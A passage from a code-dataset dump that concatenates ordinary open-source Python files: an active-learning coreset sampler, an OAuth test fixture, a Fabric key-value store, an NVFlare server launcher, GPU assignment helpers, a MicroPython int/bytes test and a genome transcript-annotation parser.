proba = 0.5 * proba / proba.sum() + 0.5 * dists / sum_dists
proba = proba / np.linalg.norm(proba, ord=1)
return np.random.choice(np.arange(x.shape[0]), n, replace=False, p=proba)
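# Hedged usage sketch, not part of the original small-text module: calling
# lightweight_coreset with a precomputed mean. The values are illustrative
# assumptions only.
# x = np.random.rand(50, 8).astype(np.float32)
# x_mean = x.mean(axis=0)
# sampled = lightweight_coreset(x, x_mean, n=5)
# `sampled` contains 5 distinct row indices of `x`, drawn without replacement
# from a distribution mixing a uniform term with squared distances to the mean.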
class LightweightCoreset(EmbeddingBasedQueryStrategy):
"""Selects instances by constructing a lightweight coreset [BLK18]_ over document embeddings.
"""
def __init__(self, normalize=True):
"""
Parameters
----------
normalize : bool
Embeddings will be normalized before the coreset construction if True.
"""
self.normalize = normalize
def sample(self, clf, dataset, indices_unlabeled, _indices_labeled, _y, n, embeddings,
embeddings_proba=None):
embeddings = embeddings[indices_unlabeled]
embeddings_mean = np.mean(embeddings, axis=0)
if self.normalize:
from sklearn.preprocessing import normalize
embeddings = normalize(embeddings)
embeddings_mean = normalize(embeddings_mean[np.newaxis, :])
embeddings_mean = embeddings_mean.ravel()
return lightweight_coreset(embeddings, embeddings_mean, n, normalized=self.normalize)
def __str__(self):
return f'LightweightCoreset(normalize={self.normalize})'
|
44b24006ac794d6e8fbc0cb8380887bd98010bee
|
2909c14ac6232b4867a3aca166945634da5f9b7a
|
/tests/functional_tests/expected_values/linkedin.py
|
f2ee89bd22865a3c8e031d9264869d6f698c81f8
|
[
"MIT"
] |
permissive
|
authomatic/authomatic
|
4c66cd6941e4309c8226ee935261ce2bd3bebde8
|
290e62e572f038fbd01d686a4556629f72037c15
|
refs/heads/master
| 2023-09-03T04:03:55.755212
| 2023-06-09T10:55:35
| 2023-06-09T10:55:35
| 8,073,983
| 289
| 67
|
MIT
| 2023-06-09T10:55:36
| 2013-02-07T14:13:35
|
Python
|
UTF-8
|
Python
| false
| false
| 2,360
|
py
|
linkedin.py
|
# -*- coding: utf-8 -*-
import re
import fixtures
import constants
from authomatic.providers import oauth2
conf = fixtures.get_configuration('linkedin')
CONFIG = {
'login_xpath': '//*[@id="session_key-oauth2SAuthorizeForm"]',
'password_xpath': '//*[@id="session_password-oauth2SAuthorizeForm"]',
'consent_xpaths': [],
'class_': oauth2.LinkedIn,
'scope': oauth2.LinkedIn.user_info_scope,
'user': {
'birth_date': None,
'city': None,
'country': conf.user_country,
'email': conf.user_email,
'first_name': conf.user_first_name,
'gender': None,
'id': conf.user_id,
'last_name': conf.user_last_name,
# 'link': re.compile(r'^https://www\.linkedin\.com/in/\w+$'),
'link': re.compile(r'^https://www\.linkedin\.com/.*'),
'locale': None,
'location': re.compile(r'^\w{2}$'),
'name': conf.user_name,
'nickname': None,
'phone': None,
'picture': re.compile(r'^https://media.licdn.com/mpr/mprx/[\w_-]+$'),
'postal_code': None,
'timezone': None,
'username': None,
},
'content_should_contain': [
conf.user_country,
conf.user_email,
conf.user_first_name,
conf.user_id,
conf.user_last_name,
conf.user_name,
# User info JSON keys
'code', 'country', 'emailAddress', 'firstName', 'formattedName', 'id',
'lastName', 'location', 'name', 'pictureUrl', 'publicProfileUrl',
],
# Case insensitive
'content_should_not_contain':
conf.no_birth_date +
conf.no_city +
conf.no_gender +
conf.no_locale +
conf.no_nickname +
conf.no_phone +
conf.no_postal_code +
conf.no_timezone +
conf.no_username,
# True means that any truthy value is expected
'credentials': {
'token_type': None,
'provider_type_id': '2-9',
'_expiration_time': True,
'consumer_key': None,
'provider_id': None,
'consumer_secret': None,
'token': True,
'token_secret': None,
'_expire_in': True,
'provider_name': 'linkedin',
'refresh_token': None,
'provider_type': 'authomatic.providers.oauth2.OAuth2',
'refresh_status': constants.CREDENTIALS_REFRESH_NOT_SUPPORTED,
},
}
|
880bab4e4f22fd0a8f487c6df885a4f3d45f5dfa
|
9577725de28e621e4b0ec275251a2b2e7ecb0261
|
/boxsdk/object/event.py
|
c18424c2aaac3d219790f2529bb1445833f7009f
|
[
"Apache-2.0"
] |
permissive
|
box/box-python-sdk
|
0b7014d69da14baacf9ac777c347664b924325b5
|
4f11d7596488194fc740936fe987f42864003d41
|
refs/heads/main
| 2023-08-17T04:33:23.692675
| 2023-08-11T11:24:36
| 2023-08-11T11:24:36
| 30,386,388
| 424
| 285
|
Apache-2.0
| 2023-09-14T11:43:27
| 2015-02-06T00:30:55
|
Python
|
UTF-8
|
Python
| false
| false
| 140
|
py
|
event.py
|
from .api_json_object import APIJSONObject
class Event(APIJSONObject):
"""Represents a single Box event."""
_item_type = 'event'
|
973aa55403d9182492c5b570e9ad171b5810fb0d
|
53a378e41f734a730c71815dd025b0f0b55b3ec6
|
/hfc/util/keyvaluestore.py
|
95a488800388467f573363b8f4af01b2d505ee01
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
hyperledger/fabric-sdk-py
|
9db7635ed2c106395dbae0e5ffddee130c1f5afc
|
0ca510569229217f81fb093682c38e1b4a0cd7c6
|
refs/heads/main
| 2023-08-24T06:13:49.843521
| 2023-03-20T18:33:01
| 2023-03-30T23:57:34
| 67,946,893
| 439
| 292
|
Apache-2.0
| 2023-06-10T19:07:14
| 2016-09-11T18:26:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,783
|
py
|
keyvaluestore.py
|
# Copyright IBM Corp. 2016 All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from abc import ABCMeta, abstractmethod
import rx
import six
@six.add_metaclass(ABCMeta)
class KeyValueStore(object):
""" An key value store for blockchain application state persistence. """
@abstractmethod
def set_value(self, key, value):
"""Set a value with a specific key.
:param key: key
:param value: value
"""
@abstractmethod
def get_value(self, key):
"""Get a value with a specific key.
:param key: key
:return: value
"""
@abstractmethod
def async_set_value(self, key, value, scheduler=None):
"""Set a value with a specific key.
:param scheduler: scheduler
:param key: key
:param value: value
:return:a future object
"""
@abstractmethod
def async_get_value(self, key, scheduler=None):
"""Get a value with a specific key.
:param scheduler: scheduler
:param key: key
:return:a future object
"""
class FileKeyValueStore(KeyValueStore):
""" A key value store implementation based file system. """
def __init__(self, path):
"""Init the file key value store.
:param path: path of key value store
:return:
"""
self.path = path
_make_dir(path)
def set_value(self, key, value):
"""Set a value with a specific key.
Args:
key: key
value: value
        Returns: True on success
        Raises: file manipulation exceptions
"""
file_path = os.path.join(self.path, key)
with open(file_path, 'w') as f:
f.write(value)
return True
def get_value(self, key):
"""Get a value with a specific key.
:param key: key
:return: value
"""
try:
file_path = os.path.join(self.path, key)
with open(file_path) as f:
return f.read()
except IOError:
return None
def async_get_value(self, key, scheduler=None):
"""Get a value with a specific key.
:param scheduler: scheduler
:param key: key
:return:a future object
"""
return rx.start(lambda: self.get_value(key), scheduler)
def async_set_value(self, key, value, scheduler=None):
"""Set a value with a specific key.
:param scheduler: scheduler
:param key: key
:param value: value
:return:a future object
"""
return rx.start(lambda: self.set_value(key, value), scheduler)
def get_attrs(self):
return ",".join("{}={}"
.format(k, getattr(self, k))
for k in self.__dict__.keys())
def __str__(self):
return "[{}:{}]".format(self.__class__.__name__, self.get_attrs())
def _make_dir(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
def file_key_value_store(path):
"""Factory method for creating file key value store.
:param path: path
:return an instance of file key value store
"""
return FileKeyValueStore(path)
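# Hedged usage sketch, not part of the original fabric-sdk-py module: a simple
# synchronous round trip through the file-backed store. The path and keys are
# illustrative assumptions.
# store = file_key_value_store('/tmp/fabric-kv-demo')
# store.set_value('enrollment-cert', 'pem-contents')
# assert store.get_value('enrollment-cert') == 'pem-contents'
# assert store.get_value('missing-key') is None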
|
2f6c0265ada5c332796bb9fe6bbec4f94ef4bfab
|
7f24023d365e013ec0924844c1a872edfb0c75b4
|
/pyxb/bundles/opengis/iso19139/v20070417/gco.py
|
94f530efcf32213ff94b19f1d115506ff5ee32a4
|
[
"Python-2.0",
"MIT",
"Apache-2.0"
] |
permissive
|
pabigot/pyxb
|
cd42c024607572c6363682d389e9296caf3f2857
|
5ee5ba54c9f702dc9c9efc2731ee547ecd4dae4a
|
refs/heads/next
| 2023-05-11T03:23:19.599756
| 2023-04-29T20:38:15
| 2023-04-29T20:45:13
| 20,547,850
| 130
| 63
|
Apache-2.0
| 2021-08-19T16:52:18
| 2014-06-06T01:49:03
|
Python
|
UTF-8
|
Python
| false
| false
| 62
|
py
|
gco.py
|
from pyxb.bundles.opengis.iso19139.v20070417.raw.gco import *
|
1a0e27ad3def68364cc5de5e8916ed964c09b50c
|
e210c28eeed9d38eb78c14b3a6388eca1e0e85d8
|
/nvflare/private/fed/app/server/server_train.py
|
6da0de4ded7c5aba2bb69b56d92f8bc1f25ae483
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/NVFlare
|
5a2d2e4c85a3fd0948e25f1ba510449727529a15
|
1433290c203bd23f34c29e11795ce592bc067888
|
refs/heads/main
| 2023-08-03T09:21:32.779763
| 2023-07-05T21:17:16
| 2023-07-05T21:17:16
| 388,876,833
| 442
| 140
|
Apache-2.0
| 2023-09-14T19:12:35
| 2021-07-23T17:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 5,786
|
py
|
server_train.py
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated server launching script."""
import argparse
import logging
import os
import sys
import time
from nvflare.apis.fl_constant import JobConstants, SiteType, WorkspaceConstants
from nvflare.apis.workspace import Workspace
from nvflare.fuel.common.excepts import ConfigError
from nvflare.fuel.f3.mpm import MainProcessMonitor as mpm
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import AppFolderConstants
from nvflare.private.fed.app.fl_conf import FLServerStarterConfiger, create_privacy_manager
from nvflare.private.fed.app.utils import create_admin_server
from nvflare.private.fed.server.server_status import ServerStatus
from nvflare.private.fed.utils.fed_utils import add_logfile_handler, fobs_initialize, security_init
from nvflare.private.privacy_manager import PrivacyService
from nvflare.security.logging import secure_format_exception
def main():
if sys.version_info < (3, 7):
raise RuntimeError("Please use Python 3.7 or above.")
parser = argparse.ArgumentParser()
parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
parser.add_argument(
"--fed_server", "-s", type=str, help="an aggregation server specification json file", required=True
)
parser.add_argument("--set", metavar="KEY=VALUE", nargs="*")
args = parser.parse_args()
kv_list = parse_vars(args.set)
config_folder = kv_list.get("config_folder", "")
if config_folder == "":
args.server_config = JobConstants.SERVER_JOB_CONFIG
else:
args.server_config = os.path.join(config_folder, JobConstants.SERVER_JOB_CONFIG)
# TODO:: remove env and train config since they are not core
args.env = os.path.join("config", AppFolderConstants.CONFIG_ENV)
args.train_config = os.path.join("config", AppFolderConstants.CONFIG_TRAIN)
args.config_folder = config_folder
logger = logging.getLogger()
args.log_config = None
workspace = Workspace(root_dir=args.workspace, site_name="server")
for name in [WorkspaceConstants.RESTART_FILE, WorkspaceConstants.SHUTDOWN_FILE]:
try:
f = workspace.get_file_path_in_root(name)
if os.path.exists(f):
os.remove(f)
except Exception:
print(f"Could not remove file '{name}'. Please check your system before starting FL.")
sys.exit(-1)
try:
os.chdir(args.workspace)
fobs_initialize()
conf = FLServerStarterConfiger(
workspace=workspace,
args=args,
kv_list=args.set,
)
log_level = os.environ.get("FL_LOG_LEVEL", "")
numeric_level = getattr(logging, log_level.upper(), None)
if isinstance(numeric_level, int):
logging.getLogger().setLevel(numeric_level)
logger.debug("loglevel debug enabled")
logger.info("loglevel info enabled")
logger.warning("loglevel warn enabled")
logger.error("loglevel error enabled")
logger.critical("loglevel critical enabled")
conf.configure()
log_file = workspace.get_log_file_path()
add_logfile_handler(log_file)
deployer = conf.deployer
secure_train = conf.cmd_vars.get("secure_train", False)
security_init(
secure_train=secure_train,
site_org=conf.site_org,
workspace=workspace,
app_validator=conf.app_validator,
site_type=SiteType.SERVER,
)
# initialize Privacy Service
privacy_manager = create_privacy_manager(workspace, names_only=True)
PrivacyService.initialize(privacy_manager)
admin_server = None
try:
# Deploy the FL server
services = deployer.deploy(args)
first_server = sorted(conf.config_data["servers"])[0]
# allow command to overwrite the admin_host
if conf.cmd_vars.get("host", None):
first_server["admin_host"] = conf.cmd_vars["host"]
admin_server = create_admin_server(
services,
server_conf=first_server,
args=args,
secure_train=secure_train,
)
admin_server.start()
services.set_admin_server(admin_server)
# mpm.add_cleanup_cb(admin_server.stop)
finally:
deployer.close()
logger.info("Server started")
# From Python 3.9 and above, the ThreadPoolExecutor does not allow submit() to create a new thread while the
# main thread has exited. Use the ServerStatus.SHUTDOWN to keep the main thread waiting for the gRPC
# server to be shutdown.
while services.status != ServerStatus.SHUTDOWN:
time.sleep(1.0)
if admin_server:
admin_server.stop()
services.engine.close()
except ConfigError as e:
logger.exception(f"ConfigError: {secure_format_exception(e)}")
raise e
if __name__ == "__main__":
"""
This is the main program when starting the NVIDIA FLARE server process.
"""
mpm.run(main_func=main)
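# Hedged usage sketch, not part of the original NVFlare script: starting the
# server process with the arguments parsed above. The paths are illustrative
# assumptions.
#     python server_train.py --workspace /opt/nvflare/server \
#         --fed_server fed_server.json --set config_folder=config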
|
b65ffee007d5cde790b3d2d40fe7b65dfff158cb
|
9edbe7b1ec03b557aa8f5b8fc6b7623bdb9151b3
|
/sample_factory/utils/gpu_utils.py
|
d94673f30cc6895deda4b1aabfa322591d4e47eb
|
[
"MIT"
] |
permissive
|
alex-petrenko/sample-factory
|
77c0370ef73902c5530acec7cb49cc1eff224173
|
7e1e69550f4de4cdc003d8db5bb39e186803aee9
|
refs/heads/master
| 2023-07-24T17:27:10.924055
| 2023-06-30T12:09:31
| 2023-06-30T12:09:31
| 192,824,415
| 644
| 99
|
MIT
| 2023-07-17T08:50:05
| 2019-06-20T00:59:01
|
Python
|
UTF-8
|
Python
| false
| false
| 3,428
|
py
|
gpu_utils.py
|
import os
from typing import List, Optional
import torch
from sample_factory.utils.get_available_gpus import get_gpus_without_triggering_pytorch_cuda_initialization
from sample_factory.utils.utils import log
CUDA_ENVVAR = "CUDA_VISIBLE_DEVICES"
def set_global_cuda_envvars(cfg):
if CUDA_ENVVAR not in os.environ:
if cfg.device == "cpu":
available_gpus = ""
else:
available_gpus = get_gpus_without_triggering_pytorch_cuda_initialization(os.environ)
os.environ[CUDA_ENVVAR] = available_gpus
log.info(f"Environment var {CUDA_ENVVAR} is {os.environ[CUDA_ENVVAR]}")
def get_available_gpus() -> List[int]:
"""
Returns indices of GPUs specified by CUDA_VISIBLE_DEVICES.
"""
    orig_visible_devices = os.environ[CUDA_ENVVAR]
available_gpus = [int(g.strip()) for g in orig_visible_devices.split(",") if g and not g.isspace()]
return available_gpus
def gpus_for_process(process_idx: int, num_gpus_per_process: int, gpu_mask: Optional[List[int]] = None) -> List[int]:
"""
Returns indices of GPUs to use for a process. These indices already respect the CUDA_VISIBLE_DEVICES envvar.
    I.e. if CUDA_VISIBLE_DEVICES is '1,2,3', then from torch's perspective there are three visible GPUs
with indices 0, 1, and 2.
Therefore, in this case gpus_for_process(0, 1) returns [0], gpus_for_process(1, 1) returns [1], etc.
"""
available_gpus = get_available_gpus()
if gpu_mask is not None:
assert len(available_gpus) >= len(
gpu_mask
), f"Number of available GPUs ({len(available_gpus)}) is less than number of GPUs in mask ({len(gpu_mask)})"
available_gpus = [available_gpus[g] for g in gpu_mask]
num_gpus = len(available_gpus)
gpus_to_use = []
if num_gpus == 0:
return gpus_to_use
first_gpu_idx = process_idx * num_gpus_per_process
for i in range(num_gpus_per_process):
index_mod_num_gpus = (first_gpu_idx + i) % num_gpus
gpus_to_use.append(index_mod_num_gpus)
log.debug(
f"Using GPUs {gpus_to_use} for process {process_idx} (actually maps to GPUs {[available_gpus[g] for g in gpus_to_use]})"
)
return gpus_to_use
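# Hedged illustration, not part of the original sample-factory module: with
# CUDA_VISIBLE_DEVICES="1,2,3" (three GPUs, visible to torch as 0, 1 and 2) and
# one GPU per process, gpus_for_process(0, 1) -> [0], gpus_for_process(1, 1) -> [1],
# and gpus_for_process(3, 1) -> [0] again, because indices wrap modulo the
# number of visible GPUs.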
def set_gpus_for_process(process_idx, num_gpus_per_process, process_type, gpu_mask=None):
# in this function we want to limit the number of GPUs visible to the process, i.e. if
# CUDA_VISIBLE_DEVICES is '1,2,3' and we want to use GPU index 2, then we want to set
# CUDA_VISIBLE_DEVICES to '3' for this process
gpus_to_use = gpus_for_process(process_idx, num_gpus_per_process, gpu_mask)
if not gpus_to_use:
os.environ[CUDA_ENVVAR] = ""
log.debug("Not using GPUs for %s process %d", process_type, process_idx)
else:
available_gpus = get_available_gpus()
cuda_devices_to_use = ",".join([str(available_gpus[g]) for g in gpus_to_use])
os.environ[CUDA_ENVVAR] = cuda_devices_to_use
log.info(
"Set environment var %s to %r (GPU indices %r) for %s process %d",
CUDA_ENVVAR,
os.environ[CUDA_ENVVAR],
gpus_to_use,
process_type,
process_idx,
)
log.debug("Num visible devices: %r", torch.cuda.device_count())
return gpus_to_use
# TODO: do we need this func?
def cuda_envvars_for_policy(policy_id, process_type):
set_gpus_for_process(policy_id, 1, process_type)
|
1445ff4a7981ffe618dce401e09f10f450923a7b
|
83b8b30ebb633eecd29ca0a7a20cc43a293c9333
|
/tests/basics/int_bytes.py
|
d42afac1fd4ecf4e3ee5f9b6c99084455dcc3555
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
adafruit/circuitpython
|
430ec895149d1eb814b505db39b4977a35ee88a7
|
506dca71b0cbb7af749bb51f86b01021db5483b3
|
refs/heads/main
| 2023-08-21T16:30:46.781068
| 2023-08-20T00:39:44
| 2023-08-20T00:39:44
| 66,166,069
| 3,806
| 1,560
|
MIT
| 2023-09-14T19:23:51
| 2016-08-20T20:10:40
|
C
|
UTF-8
|
Python
| false
| false
| 1,303
|
py
|
int_bytes.py
|
print((10).to_bytes(1, "little"))
print((-10).to_bytes(1, "little", signed=True))
# Test fitting in length that's not a power of two.
print((0x10000).to_bytes(3, 'little'))
print((111111).to_bytes(4, "little"))
print((-111111).to_bytes(4, "little", signed=True))
print((100).to_bytes(10, "little"))
print((-100).to_bytes(10, "little", signed=True))
# check that extra zero bytes don't change the internal int value
print(int.from_bytes(bytes(20), "little") == 0)
print(int.from_bytes(b"\x01" + bytes(20), "little") == 1)
# big-endian conversion
print((10).to_bytes(1, "big"))
print((-10).to_bytes(1, "big", signed=True))
print((100).to_bytes(10, "big"))
print((-100).to_bytes(10, "big", signed=True))
print(int.from_bytes(b"\0\0\0\0\0\0\0\0\0\x01", "big"))
print(int.from_bytes(b"\x01\0", "big"))
# negative number of bytes should raise an error
try:
(1).to_bytes(-1, "little")
except ValueError:
print("ValueError")
# too small buffer should raise an error
try:
(256).to_bytes(1, "little")
except OverflowError:
print("OverflowError")
# negative numbers should raise an error if signed=False
try:
(-256).to_bytes(2, "little")
except OverflowError:
print("OverflowError")
try:
(-256).to_bytes(2, "little", signed=False)
except OverflowError:
print("OverflowError")
|
833f1e7f7d9f960e689f8e18af5171a0012ce401
|
80529a0e7959d1165c14b8cfb2c61262d293421a
|
/transvar/parser.py
|
a6ca397e0177e3d4aa6339dbb21a02e6a98698b9
|
[
"MIT"
] |
permissive
|
zwdzwd/transvar
|
32f126524d996832bb1e0153c0c5ec2575ff9b20
|
f7c17a8def902c00c403066fce791c3ad4eeb355
|
refs/heads/master
| 2023-04-29T17:36:43.585077
| 2022-01-11T19:35:55
| 2022-01-11T19:35:55
| 50,932,056
| 120
| 39
|
NOASSERTION
| 2023-04-19T22:39:27
| 2016-02-02T15:55:41
|
Python
|
UTF-8
|
Python
| false
| false
| 23,250
|
py
|
parser.py
|
"""
The MIT License
Copyright (c) 2015
The University of Texas MD Anderson Cancer Center
Wanding Zhou, Tenghui Chen, Ken Chen (kchen3@mdanderson.org)
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from .transcripts import *
def parse_ucsc_refgene(map_file, name2gene):
""" start 1-based, end 1-based """
cnt = 0
for line in opengz(map_file):
if line.startswith('#'): continue
fields = line.strip().split('\t')
if fields[13] != 'cmpl' or fields[14] != 'cmpl':
continue
gene_name = fields[12].upper()
if gene_name in name2gene:
gene = name2gene[gene_name]
else:
gene = Gene(name=gene_name)
name2gene[gene_name] = gene
t = Transcript()
t.name = fields[1]
t.chrm = normalize_chrm(fields[2])
t.strand = fields[3]
t.beg = int(fields[4])+1
t.end = int(fields[5])
t.cds_beg = int(fields[6])+1
t.cds_end = int(fields[7])
t.source = 'UCSC_refGene'
ex_begs, ex_ends = fields[9], fields[10]
for ex_beg, ex_end in zip([int(x)+1 for x in ex_begs.strip(',').split(',')],
list(map(int, ex_ends.strip(',').split(',')))):
t.exons.append((ex_beg, ex_end))
t.exons.sort() # keep exons sorted
gene.tpts.append(t)
t.gene = gene
cnt += 1
err_print('loaded %d transcripts from UCSC refgene.' % cnt)
return
def parse_ucsc_refgene_customized(map_file, name2gene):
""" start 1-based, end 1-based """
cnt = 0
for line in open(map_file):
fields = line.strip().split()
gene_name = fields[0].upper()
if gene_name in name2gene:
gene = name2gene[gene_name]
else:
gene = Gene(name=gene_name)
name2gene[gene_name] = gene
t = Transcript()
t.chrm = normalize_chrm(fields[1])
t.strand = fields[2]
t.beg = int(fields[3])
t.end = int(fields[4])
t.seq = fields[-1]
t.cds_beg = int(fields[5])
t.cds_end = int(fields[6])
t.source = 'custom'
t.name = '.'
ex_begs, ex_ends = fields[8], fields[9]
for ex_beg, ex_end in zip(list(map(int, ex_begs.split(','))),
list(map(int, ex_ends.split(',')))):
t.exons.append((ex_beg, ex_end))
t.exons.sort() # keep exons sorted
gene.tpts.append(t)
t.gene = gene
cnt += 1
err_print('loaded %d transcripts from customized table.' % cnt)
return
def parse_refseq_gff(gff_fn, name2gene):
id2ent = {}
gff_fh = opengz(gff_fn)
reg = None
cnt = 0
for line in gff_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
# print line.strip()
info = dict([_.split('=') for _ in fields[8].split(';')])
if fields[2] == 'region':
if 'chromosome' in info:
reg = Region(info['chromosome'], int(fields[3]), int(fields[4]))
if 'map' in info and info['map']=='unlocalized':
                reg.unlocalized = True
# else:
# reg = None
elif (reg and fields[2] == 'gene' and
('pseudo' not in info or info['pseudo'] != 'true')):
if reg.unlocalized:
continue
gene_name = info['Name'].upper()
if gene_name in name2gene:
g = name2gene[gene_name]
if hasattr(g, '_gene_id') and g._gene_id != info['ID']:
continue # if a gene_name appears twice, then all the subsequent occurrences are all ignored.
else:
g = Gene(name=gene_name)
name2gene[gene_name] = g
g._gene_id = info['ID']
g.beg = int(fields[3])
g.end = int(fields[4])
id2ent[info['ID']] = g
if 'Dbxref' in info:
g.dbxref = info['Dbxref']
elif (fields[2] in ['mRNA', 'ncRNA', 'rRNA', 'tRNA']
and 'Parent' in info and info['Parent'] in id2ent):
if reg.unlocalized:
continue
if fields[2] == 'mRNA':
fields[2] = 'protein_coding'
if fields[2] == 'ncRNA' and 'ncrna_class' in info:
fields[2] = info['ncrna_class']
t = Transcript(transcript_type=fields[2])
t.chrm = normalize_chrm(reg.name)
t.strand = fields[6]
t.beg = int(fields[3])
t.end = int(fields[4])
t.name = info['Name'] if 'Name' in info else info['product']
t.gene = id2ent[info['Parent']]
t.gene.tpts.append(t)
t.source = 'RefSeq'
id2ent[info['ID']] = t
cnt += 1
elif fields[2] == 'exon' and info['Parent'] in id2ent:
if reg.unlocalized:
continue
t = id2ent[info['Parent']]
if (isinstance(t, Gene)):
g = t
if not hasattr(g, 'gene_t'):
g.gene_t = Transcript()
g.tpts.append(g.gene_t)
g.gene_t.chrm = normalize_chrm(reg.name)
g.gene_t.strand = fields[6]
g.gene_t.gene = g
g.gene_t.beg = g.beg
g.gene_t.end = g.end
g.gene_t.source = 'RefSeq'
cnt += 1
t = g.gene_t
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS' and info['Parent'] in id2ent:
if reg.unlocalized:
continue
t = id2ent[info['Parent']]
if (isinstance(t, Gene)):
g = t
if not hasattr(g, 'gene_t'):
g.gene_t = Transcript()
g.tpts.append(g.gene_t)
g.gene_t.chrm = normalize_chrm(reg.name)
g.gene_t.strand = fields[6]
g.gene_t.gene = g
g.gene_t.beg = g.beg
g.gene_t.end = g.end
g.gene_t.source = 'RefSeq'
cnt += 1
t = g.gene_t
t.cds.append((int(fields[3]), int(fields[4])))
err_print("loaded %d transcripts from RefSeq GFF3 file." % cnt)
def parse_ensembl_gtf(gtf_fn, name2gene):
"""
This parses the new GTF after or equal to hg19.
The function does not handle hg18.
gtf file is gffv2
parser does not assume order in the GTF file
"""
gtf_fh = opengz(gtf_fn)
id2ent = {}
cnt = 0
for line in gtf_fh:
if line.startswith('#'):
continue
fields = line.strip().split('\t')
info = dict(re.findall(r'\s*([^"]*) "([^"]*)";', fields[8]))
# info = dict([_.split('=') for _ in fields[8].split(';')])
if fields[2] == 'gene':
gene_id = info['gene_id']
if gene_id not in id2ent:
id2ent[gene_id] = Gene(gene_type=info['gene_biotype'])
g = id2ent[gene_id]
if 'gene_name' in info:
g.name = info['gene_name'].upper()
else:
g.name = gene_id
if g.name not in name2gene: name2gene[g.name] = g
g.beg = int(fields[3])
g.end = int(fields[4])
elif fields[2] == 'transcript':
            # there exist two transcript formats in ensembl gtf
# the old version has no 'transcript_biotype'
# the equivalent transcript_biotype is fields[1]
tid = info['transcript_id']
if tid not in id2ent:
transcript_type = info['transcript_biotype'] if 'transcript_biotype' in info else fields[1]
id2ent[tid] = Transcript(transcript_type=transcript_type)
t = id2ent[tid]
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.beg = int(fields[3])
t.end = int(fields[4])
t.name = info['transcript_id']
gene_id = info['gene_id']
if gene_id not in id2ent:
id2ent[gene_id] = Gene(gene_type=info['gene_biotype'])
t.gene = id2ent[gene_id]
t.gene.tpts.append(t)
t.source = 'Ensembl'
cnt += 1
elif fields[2] == 'exon':
tid = info['transcript_id']
if tid not in id2ent:
transcript_type = info['transcript_biotype'] if 'transcript_biotype' in info else fields[1]
id2ent[tid] = Transcript(transcript_type=transcript_type)
t = id2ent[tid]
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS':
tid = info['transcript_id']
if tid not in id2ent:
transcript_type = info['transcript_biotype'] if 'transcript_biotype' in info else fields[1]
id2ent[tid] = Transcript(transcript_type=transcript_type)
t = id2ent[tid]
t.cds.append((int(fields[3]), int(fields[4])))
err_print("loaded %d transcripts from Ensembl GTF file." % cnt)
def parse_ensembl_gtf_hg18(gtf_fn, name2gene):
"""
This parses the old ensembl GTF before or equal to hg18.
The function does not handle hg19 or later.
"""
gtf_fh = opengz(gtf_fn)
tid2transcript = {}
cnt = 0
for line in gtf_fh:
if line.startswith('#'):
continue
fields = line.strip().split('\t')
info = dict(re.findall(r'\s*([^"]*) "([^"]*)";', fields[8]))
if fields[2] == "exon":
if info['transcript_id'] in tid2transcript:
t = tid2transcript[info['transcript_id']]
else:
t = Transcript(transcript_type=fields[1])
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
tid2transcript[t.name] = t
if info['gene_name'] in name2gene:
g = name2gene[info['gene_name']]
else:
g = Gene()
g.name = info['gene_name']
name2gene[g.name] = g
t.gene = g
g.tpts.append(t)
t.source = 'Ensembl'
cnt += 1
t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS':
if info['transcript_id'] in tid2transcript:
t = tid2transcript[info['transcript_id']]
else:
t = Transcript(transcript_type=fields[1])
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
tid2transcript[t.name] = t
if info['gene_name'] in name2gene:
g = name2gene[info['gene_name']]
else:
g = Gene()
g.name = info['gene_name']
name2gene[g.name] = g
t.gene = g
g.tpts.append(t)
t.source = 'Ensembl'
cnt += 1
t.cds.append((int(fields[3]), int(fields[4])))
for t in list(tid2transcript.values()):
t.exons.sort()
t.beg = t.exons[0][0]
t.end = t.exons[-1][1]
err_print("loaded %d transcripts from Ensembl GTF file." % cnt)
def parse_ccds_table(ccds_fn, name2gene):
""" start 0-based end 0-based """
